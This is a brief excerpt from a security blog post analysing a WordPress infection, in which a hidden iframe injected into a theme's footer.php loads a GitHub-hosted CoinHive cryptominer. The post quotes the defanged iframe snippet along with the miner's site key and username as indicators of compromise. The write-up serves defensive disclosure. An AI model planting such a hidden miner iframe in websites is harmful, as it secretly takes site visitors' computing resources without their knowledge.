Recently, a webmaster contacted us when his AVG antivirus reported that the JS:Miner-C [Trj] infection was found on their site.
Our investigation revealed a hidden iframe had been injected into the theme’s footer.php file:
<iframe src="hxxps://wpupdates.github[.]io/ping/” style=”width:0;heigh:0;border:none;”>
When we opened the URL in a browser, the page was blank.
After checking the HTML source code, we discovered a piece of JavaScript using the CoinHive miner with the site key, CZziRExmOxYEE65Hm4E9fycCuNqZH1G9 and the username, MoneroU.
Continue reading Malicious Cryptominers from GitHub at Sucuri Blog.